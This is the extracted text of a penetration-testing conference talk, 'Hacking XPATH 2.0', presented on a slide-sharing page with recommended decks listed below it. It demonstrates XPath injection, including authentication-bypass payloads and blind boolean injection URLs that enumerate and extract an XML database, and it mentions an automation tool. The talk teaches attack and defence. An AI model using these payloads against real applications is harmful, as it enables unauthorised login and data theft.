hacking xpath 2 0 tom forbes sumit siddharth 7safe uk
play

Hacking XPATH 2.0 Tom Forbes Sumit Siddharth 7Safe, - PowerPoint PPT Presentation

Jun 17, 2023 •858 likes •1.52k views

Hacking XPATH 2.0 Tom Forbes Sumit Siddharth 7Safe, UK Who Are We.. Sumit sid Siddharth Head of PenetraCon TesCng at 7Safe

  1. Hacking ¡XPATH ¡2.0 ¡ ¡ Tom ¡Forbes ¡ Sumit ¡Siddharth ¡ 7Safe, ¡UK ¡ ¡

  2. Who ¡Are ¡We.. ¡ – Sumit ¡‘sid’ ¡Siddharth ¡ • Head ¡of ¡PenetraCon ¡TesCng ¡at ¡7Safe ¡ • Specialist ¡in ¡applicaCon ¡and ¡database ¡security ¡ • Speaker ¡at ¡Black ¡Hat, ¡DEF ¡CON ¡2009, ¡2010, ¡ 2011 ¡ ¡ • Co-­‑author ¡of ¡book ¡SQL ¡InjecCon, ¡ATacks ¡and ¡ Defense ¡(2 nd ¡ediCon) ¡

  3. Who ¡Are ¡We.. ¡ – Tom ¡Forbes ¡ • First ¡year ¡University ¡student ¡ ¡ • Summer ¡Intern ¡at ¡7safe ¡ • Loves ¡to ¡code! ¡

  4. XPATH: ¡WHAT ¡IS ¡IT? ¡ ¡ ¡ ¡

  5. What ¡is ¡it? ¡ • Query ¡language ¡for ¡selecCng ¡nodes ¡in ¡an ¡XML ¡ document ¡ – Think ¡SQL ¡for ¡XML ¡ • Two ¡versions ¡ – 1.0 ¡released ¡November ¡1999 ¡ – 2.0 ¡released ¡December ¡2010 ¡

  6. XPATH’s ¡XML ¡Nomenclature ¡ Node ¡ Root ¡node ¡ Node ¡value ¡ Comment ¡ Node ¡ Node ¡name ¡ ATribute ¡name ¡ ATribute ¡value ¡

  7. Why ¡use ¡it? ¡ • XPath ¡allows ¡you ¡to ¡write ¡complex ¡queries ¡ based ¡upon ¡pracCcally ¡anything ¡in ¡the ¡XML ¡ dataset ¡(aTributes, ¡children, ¡other ¡nodes) ¡ – Which ¡allows ¡you ¡to ¡do ¡stuff ¡like ¡unions ¡and ¡joins ¡ • Lots ¡of ¡funcCons ¡for ¡date, ¡string ¡and ¡number ¡ manipulaCon ¡ – XPath ¡2.0 ¡brings ¡lots ¡of ¡new ¡funcCons ¡

  8. Examples ¡ • Return ¡nodes ¡based ¡on ¡their ¡children ¡ /Employees/Employee[UserName=‘jbravo’] – Returns ¡the ¡first ¡employee ¡in ¡our ¡example ¡(Johnny ¡Bravo) ¡ • Return ¡nodes ¡based ¡on ¡aTributes ¡ /Employees/Employee[@ID=‘2’] – Returns ¡the ¡second ¡Employee ¡in ¡our ¡database ¡ ¡

  9. Examples ¡ • Contextual ¡queries ¡ /Employees/Employee[string-length(FirstName) > 10] – Returns ¡all ¡employees ¡with ¡long ¡first ¡names ¡ /Employees/Employee[position()<=5] – Returns ¡the ¡first ¡5 ¡employees ¡ • FuncCons ¡ Avg(/Employees/Employee/Age) – Returns ¡the ¡average ¡employee ¡age ¡ – Other ¡funcCons ¡include ¡count, ¡max, ¡min, ¡sum ¡ ¡

  10. XPATH ¡INJECTION ¡

  11. XPATH ¡InjecCon ¡ • Un-­‑validated ¡users ¡input ¡used ¡in ¡XPATH ¡query ¡ • The ¡XPATH ¡query ¡can ¡be ¡altered ¡to ¡achieve: ¡ – AuthenCcaCon ¡bypass ¡ – Business ¡logic ¡bypass ¡ – ExtracCon ¡of ¡arbitrary ¡data ¡from ¡the ¡xml ¡database ¡

  12. AuthenCcaCon ¡Bypass ¡ • AuthenCcaCon ¡Bypass ¡ – string(//Employee[username/text()=‘jbravo' ¡and ¡ password/text()=‘pass123']/account/text()) ¡ ¡ – string(//Employee[username/text()=‘jbravo' ¡or ¡'1' ¡ = ¡'1' ¡and ¡password/text()=‘anything']/account/ text()) ¡ ¡ • Username=‘jbravo’ ¡or ¡[TRUE ¡and ¡FALSE] ¡ – XPATH ¡does ¡not ¡have ¡any ¡comment ¡characters ¡

  13. Demo ¡1 ¡ • AuthenCcaCon ¡Bypass ¡

  14. AuthenCcaCon ¡Bypass ¡2 ¡ • Oken ¡password ¡is ¡saved ¡in ¡encrypted ¡format ¡ – string(//Employee[username/text()=‘jbravo' ¡and ¡ password/ text()=‘ 5f4dcc3b5aa765d61d8327deb882cf99 ']/ account/text()) ¡ ¡ – Password ¡field ¡is ¡not ¡vulnerable ¡ – What ¡if ¡we ¡don’t ¡know ¡a ¡valid ¡username: ¡

  15. AuthenCcaCon ¡Bypass ¡2... ¡ • string(//Employee[username/text()=‘non_exisCng’ ¡or ¡ ‘1’=‘1' ¡and ¡password/ text()=‘ 5f4dcc3b5aa765d61d8327deb882cf99 ']/ account/text()) ¡ ¡ • Username=‘non_exisCng’ ¡OR ¡[TRUE ¡AND ¡FALSE] ¡ • Username=‘non_exisCng’ ¡or ¡False ¡ • FALSE ¡or ¡FALSE ¡ • FAIL! ¡

  16. AuthenCcaCon ¡Bypass ¡2 ¡ • string(//Employee[username/text()=‘non_exisCng’ ¡or ¡ ‘1’=‘1’ ¡or ¡‘1’=‘1' ¡and ¡password/ text()=‘ 5f4dcc3b5aa765d61d8327deb882cf99 ']/ account/text()) ¡ ¡ • Username=‘non_exisCng’ ¡OR ¡TRUE ¡OR ¡ ¡TRUE ¡AND ¡ FALSE ¡ • Username=‘non_exisCng’ ¡or ¡TRUE ¡or ¡[TRUE ¡AND ¡ FALSE] ¡ • FALSE ¡or ¡TRUE ¡or ¡FALSE ¡ • TRUE! ¡

  17. Blind ¡ ¡ XPATH ¡InjecCon ¡ • Same ¡logic ¡and ¡SQL ¡InjecCon ¡ • True ¡and ¡False ¡pages ¡ • /Employees/Employee[UserName=‘jbravo' ¡ and ¡ '1'='1 ' ¡and ¡Password=‘mypass’] ¡ – True ¡page ¡ • /Employees/Employee[UserName=‘jbravo' ¡ and ¡ '1'='2 ' ¡and ¡Password=‘mypass’] ¡ – False ¡page ¡

  18. ExploiCng ¡it ¡ • No ¡concept ¡of ¡a ¡user ¡ • No ¡concept ¡of ¡a ¡permission ¡ • No ¡security ¡whatsoever ¡ • Sweet. ¡

  19. Useful ¡funcCons ¡ • count(<node_reference>) ¡ – Returns ¡number ¡of ¡child ¡available ¡ • name(<node_name>) ¡ – Returns ¡the ¡node ¡name ¡(e.g. ¡<firstname> ¡ • string-­‑length(name(<node_name>)) ¡ – Returns ¡the ¡length ¡of ¡node ¡name ¡(<firstname>=9) ¡ ¡ • substring(name(<node_name>),<posiCon>,<1>) ¡ – returns ¡the ¡characters ¡from ¡the ¡posiCon ¡in ¡the ¡string ¡

  20. XML ¡crawling ¡[1] ¡ Name ¡of ¡the ¡root ¡node: ¡ name(/*[1])=‘Employees’ ¡ Total ¡number ¡of ¡child ¡nodes: ¡ count(/*[1]/*[1]/*)=6 ¡

  21. XML ¡crawling ¡[2] ¡ Find ¡the ¡aTribute ¡name ¡ name(/*[1]/*[1]/@*[1])=‘ID’ ¡ Finding ¡child ¡node ¡names ¡ name(/*[1])/*[1])=‘Employee’ ¡ Find ¡the ¡aTribute ¡value ¡ Substring(/*[1]/*[1]/@*[1],1,1)=‘1’ ¡ Finding ¡the ¡value, ¡if ¡it ¡does ¡not ¡have ¡a ¡child ¡ substring(/*[1]/*[1]/*[1],1,1)=‘J' ¡

  22. True ¡And ¡False ¡scenario ¡ • hTp://host/test03.php?username=abaker' ¡and ¡'1'='1 ¡ – True ¡Response ¡ – /Office/Employee[UserName='abaker‘ ¡and ¡‘1’=‘1’] ¡ • hTp://host/test03.php?username=abaker' ¡and ¡'1'=‘2 ¡ – False ¡Response ¡ • hTp://host/test03.php?username=abaker' ¡and ¡name(/ *[1])=‘EMPLOYEES’ ¡and ¡'1'='1 ¡ ¡ ¡ ¡ ¡response: ¡True ¡ – True ¡Response ¡means ¡there ¡the ¡root ¡node ¡name ¡is ¡ EMPLOYEES ¡

  23. Reading ¡comments ¡within ¡XML ¡file ¡ • Read ¡the ¡comments ¡from ¡the ¡XML ¡file: ¡ • hTp://host/?username=abaker' ¡and ¡/*[1]/ comment()='comment' ¡ ¡and ¡'1'='1 ¡

  24. AutomaCng ¡XPATH ¡InjecCon ¡ 1. Get ¡the ¡name ¡of ¡the ¡node ¡we ¡are ¡fetching ¡ 2. Count ¡the ¡aTributes ¡of ¡the ¡node ¡ 3. For ¡each ¡aTribute: ¡ a) Get ¡the ¡name ¡ b) Get ¡the ¡value ¡ 4. Retrieve ¡the ¡comment ¡(if ¡it ¡exists) ¡ 5. Count ¡the ¡number ¡of ¡child ¡nodes ¡ 6. For ¡each ¡child ¡node: ¡ a) Go ¡to ¡step ¡#1 ¡ 7. Get ¡the ¡nodes ¡text ¡content ¡

  25. XCat ¡ • XCat ¡retrieves ¡XML ¡documents ¡through ¡blind ¡ XPath ¡injecCon ¡vulnerabiliCes ¡ – WriTen ¡in ¡Python ¡ – Uses ¡all ¡the ¡techniques ¡described ¡in ¡this ¡talk ¡ – Designed ¡to ¡be ¡fast ¡ – Supports ¡XPath ¡2.0 ¡features ¡where ¡possible ¡ • More ¡on ¡it ¡later! ¡

  26. DEMO ¡2 ¡ • Xcat: ¡Downloading ¡the ¡xml ¡database ¡

  27. XPATH ¡2.0 ¡

  28. XPATH ¡2.0 ¡ • New ¡addiCon ¡ • Lot ¡more ¡funcCons ¡ • Lot ¡more ¡fun! ¡

  29. XPATH ¡2.0 ¡features.. ¡ • Hugely ¡increased ¡feature ¡set ¡ – Regular ¡expressions ¡ – CondiConals ¡and ¡programmaCc ¡errors ¡ ¡ • allows ¡blind ¡error-­‑based ¡aTacks ¡ – Overhauled ¡type ¡system ¡(19 ¡types ¡instead ¡of ¡4) ¡ – Unicode ¡normalizaCon ¡ – String ¡to ¡code ¡point ¡conversion ¡ – Remote ¡document ¡references ¡ • All ¡of ¡these ¡can ¡be ¡uClized ¡to ¡speed ¡up ¡document ¡ retrieval ¡and ¡reduce ¡the ¡key ¡space ¡we ¡have ¡to ¡ search. ¡

  30. XPATH ¡2.0 ¡features.. ¡ • Regular ¡expressions: ¡ matches(string, pattern) • We ¡can ¡use ¡it ¡to ¡see ¡if ¡a ¡string ¡contains ¡a ¡set ¡ of ¡characters ¡before ¡we ¡begin ¡retrieval ¡ matches(/Employees/Employee[1]/FirstName/text(), "[A-Z]")

Recommend

The Art of Exploiting Logical Flaws in Web Apps Sumit sid Siddharth Richard deanx

The Art of Exploiting Logical Flaws in Web Apps Sumit sid Siddharth Richard deanx

The Art of Exploiting Logical Flaws in Web Apps Sumit sid Siddharth Richard deanx Dean A GREAT COLLABORATION! 2 competitors working together! Thanks to: 7Safe, Part of PA Consulting Group Portcullis Computer Security Limited

1.17k views • 78 slides
1 XPath Navigating Xml Xml is similar to a file structure, but you can select more than

1 XPath Navigating Xml Xml is similar to a file structure, but you can select more than

XPath Based on slides by Dan Suciu University of Washington CS/INFO 1 330 XPath http://www.w3.org/TR/xpath (11/99) Building block for other W3C standards: XSL Transformations (XSLT) XML Link (XLink) XML Pointer (XPointer)

521 views • 8 slides
XPath Reference XPath leashed, Michael Benedikt and Christoph Koch, TR, 2006 1

XPath Reference XPath leashed, Michael Benedikt and Christoph Koch, TR, 2006 1

XPath Reference XPath leashed, Michael Benedikt and Christoph Koch, TR, 2006 1 Expressivity of XPath Formal setting XPath interpreted in a logical structure t with a finite set of labels and a finite set of Attributes @Ai (functions

587 views • 15 slides
9. Path expressions: XPath XPath is a language for selecting parts of XML documents it is

9. Path expressions: XPath XPath is a language for selecting parts of XML documents it is

9. Path expressions: XPath XPath is a language for selecting parts of XML documents it is a kind of simple query language . XPath does not use normal XML syntax; path expressions are strings for the parser. XPath is a tree

223 views • 20 slides
XPath Asst. Prof. Dr. Kanda Runapongsa Saikaew (krunapon@kku.ac.th) Dept. of Computer

XPath Asst. Prof. Dr. Kanda Runapongsa Saikaew (krunapon@kku.ac.th) Dept. of Computer

XPath Asst. Prof. Dr. Kanda Runapongsa Saikaew (krunapon@kku.ac.th) Dept. of Computer Engineering Khon Kaen University 1 Overview What is XPath? Queries The XPath Data Model Location Paths Expressions XPath Engines 2

992 views • 57 slides
Information Systems XPath Nikolaj Popov Research Institute for Symbolic Computation Johannes

Information Systems XPath Nikolaj Popov Research Institute for Symbolic Computation Johannes

Information Systems XPath Nikolaj Popov Research Institute for Symbolic Computation Johannes Kepler University of Linz, Austria popov@risc.uni-linz.ac.at Outline XPath XPath What is XPath? XPath is a language whose primary purpose is to

309 views • 15 slides
ETHICAL HACKING Daniel Cloherty CAN HACKING BE ETHICAL? What makes hacking ethical?

ETHICAL HACKING Daniel Cloherty CAN HACKING BE ETHICAL? What makes hacking ethical?

ETHICAL HACKING Daniel Cloherty CAN HACKING BE ETHICAL? What makes hacking ethical? Legality VS Ethics State Sanctioned hacking BLACK HAT - Stereotypical Hacker -Stealing data for personal gain -Obviously not ethical -Using

1.17k views • 10 slides
Sumit Woods Ltd. Investor Presentation November 2018 EXECUTIVE SUMMARY Sumit Woods Ltd. is

Sumit Woods Ltd. Investor Presentation November 2018 EXECUTIVE SUMMARY Sumit Woods Ltd. is

Sumit Woods Ltd. Investor Presentation November 2018 EXECUTIVE SUMMARY Sumit Woods Ltd. is the flagship company of Sumit Group, which was incorporated in the year 1997. Company It is a real estate company operating in Mumbai, Thane

522 views • 33 slides
Generative XPath One XPath to rule them all Oleg Parashchenko Saint-Petersburg State University,

Generative XPath One XPath to rule them all Oleg Parashchenko Saint-Petersburg State University,

Generative XPath One XPath to rule them all Oleg Parashchenko Saint-Petersburg State University, Russia olpa@ http://uucode.com/blog/ http://xmlhack.ru/ 1 Generative XPath XML Prague 2007 Outline Introduction Approach

662 views • 30 slides
XPath &amp; XQuery (continued) CS 645 Apr 24, 2008 1 Some slide content courtesy of

XPath &amp; XQuery (continued) CS 645 Apr 24, 2008 1 Some slide content courtesy of

XPath &amp; XQuery (continued) CS 645 Apr 24, 2008 1 Some slide content courtesy of Ramakrishnan &amp; Gehrke, Dan Suciu, Zack Ives. Today s lecture Review of XPath continuation of XQuery 2 Querying XML Data XPath = simple

569 views • 38 slides
Reference XPath leashed, Michael Benedikt and Christoph Koch, TR, 2006 XPath Formal setting

Reference XPath leashed, Michael Benedikt and Christoph Koch, TR, 2006 XPath Formal setting

Reference XPath leashed, Michael Benedikt and Christoph Koch, TR, 2006 XPath Formal setting XPath interpreted in a logical structure t with a finite set of labels and a finite set of Attributes @Ai (functions from nodes to integers)

350 views • 5 slides
XPath XPath is a language for describing paths in XML documents. XML query languages

XPath XPath is a language for describing paths in XML documents. XML query languages

XPath XPath is a language for describing paths in XML documents. XML query languages Think of an SSD graph and its paths. Path descriptors are similar to path descriptors in a (UNIX) file system. XPath A simple path descriptor

391 views • 6 slides
Outline XML Query Languages CS 235: XPATH XQUERY Introduction to Databases

Outline XML Query Languages CS 235: XPATH XQUERY Introduction to Databases

Outline XML Query Languages CS 235: XPATH XQUERY Introduction to Databases Svetlozar Nestorov Lecture Notes #26 XPATH and XQUERY Example DTD XPATH is a language for describing paths &lt;!DOCTYPE Bars [ &lt;!ELEMENT BARS

528 views • 5 slides
The The XPath XPath Language Language Abbreviations General expressions Anders Mller

The The XPath XPath Language Language Abbreviations General expressions Anders Mller

Objectives Objectives Location steps and paths An Introduction to XML and Web Technologies An Introduction to XML and Web Technologies Typical locations paths The The XPath XPath Language Language Abbreviations General

606 views • 16 slides
XPATH and XQUERY Two query language to search for features in XML documents XML Query

XPATH and XQUERY Two query language to search for features in XML documents XML Query

XPATH and XQUERY Two query language to search for features in XML documents XML Query Languages XPATH XQUERY XPATH XQUERY 1 2 XPATH XQUERY XPATH is a language for describing XQUERY is a full query language for paths in

418 views • 5 slides
Session 16 XPath 1 Objectives Understand XPath well enough to provide a background to jQuery

Session 16 XPath 1 Objectives Understand XPath well enough to provide a background to jQuery

Session 16 XPath Session 16 XPath 1 Objectives Understand XPath well enough to provide a background to jQuery 2 Robert Kelly, 2016-2018 10/29/2018 1 Robert Kelly, 2016-2018 Session 16 XPath Reading and References

685 views • 7 slides
XPath Evaluation in Linear Time Mikoaj Bojaczyk, Pawe Parys Warsaw University find the

XPath Evaluation in Linear Time Mikoaj Bojaczyk, Pawe Parys Warsaw University find the

XPath Evaluation in Linear Time Mikoaj Bojaczyk, Pawe Parys Warsaw University find the nodes in an XML document d Goal: that satisfy an XPath unary query q. We consider a fragment of XPath called FOXPath. Previous algorithms:

984 views • 85 slides
Siddharth S Saxena Siddharth S Saxena Quantum Matter Group Cavendish Laboratory University of

Siddharth S Saxena Siddharth S Saxena Quantum Matter Group Cavendish Laboratory University of

F From Quantum Critical Magnets to Q t C iti l M t t Superconducting Graphite Siddharth S Saxena Siddharth S Saxena Quantum Matter Group Cavendish Laboratory University of Cambridge Collaborators University College London M. Ellerby,

680 views • 49 slides
XPath for XML Navigation Janis Voigtl ander Technische Universit at Dresden Summer Term

XPath for XML Navigation Janis Voigtl ander Technische Universit at Dresden Summer Term

XPath for XML Navigation Janis Voigtl ander Technische Universit at Dresden Summer Term 2009 XPath for Tree Navigation: An Example Document: A B B C D D E F F E F F F F Query: /descendant::D/child::F[position()=1] XPath for

1.7k views • 143 slides
XPath: Arithmetical Operations XPath : Arithmetical Operations 3.1 Additional Features 3.1

XPath: Arithmetical Operations XPath : Arithmetical Operations 3.1 Additional Features 3.1

XPath: Arithmetical Operations XPath : Arithmetical Operations 3.1 Additional Features 3.1 Additional Features XPath XPath support for support for Operators for double Operators for double- -precision (64 bit) floating

214 views • 5 slides
Hacking Reinforcement Learning Guillem Duran Ballester Guillemdb @Miau_DB A tale about hacking

Hacking Reinforcement Learning Guillem Duran Ballester Guillemdb @Miau_DB A tale about hacking

Hacking Reinforcement Learning Guillem Duran Ballester Guillemdb @Miau_DB A tale about hacking AI-Corp Hacking RL 1. Information gathering 2. Scanning 3. Exploitation &amp; privilege escalation 4. Maintaining access &amp; covering tracks

960 views • 62 slides
Content Marketing with Forbes Adam Wallitt, VP Sales: Content Partnerships awallitt@forbes.com

Content Marketing with Forbes Adam Wallitt, VP Sales: Content Partnerships awallitt@forbes.com

Content Marketing with Forbes Adam Wallitt, VP Sales: Content Partnerships awallitt@forbes.com 3200 BC Learning Curve 1732 1895 1930s 2006 2014 Poor Richards John Deere P&amp;G produces First Unboxing The Lego Movie Almanac

624 views • 21 slides
SR 2108-A12/SR 2308-A02 Forbes Avenue Betterment and SR 2108-A13 Forbes Avenue Corridor

SR 2108-A12/SR 2308-A02 Forbes Avenue Betterment and SR 2108-A13 Forbes Avenue Corridor

SR 2108-A12/SR 2308-A02 Forbes Avenue Betterment and SR 2108-A13 Forbes Avenue Corridor Improvements | | | | July 17, 2017 Agenda Welcome Ralph Horgan, CMU Overview of Projects Feedback and Proposed

716 views • 45 slides
XML Processing (XPath, XQuery, XUpdate) Part 5: XQuery + XPath Fulltext 21.12.2011 Outline

XML Processing (XPath, XQuery, XUpdate) Part 5: XQuery + XPath Fulltext 21.12.2011 Outline

Module 3 XML Processing (XPath, XQuery, XUpdate) Part 5: XQuery + XPath Fulltext 21.12.2011 Outline Motivation Challenges XQuery Full-Text Language XQuery Full-Text Semantics and Data Model 21.12.2011 Peter

620 views • 46 slides

More recommend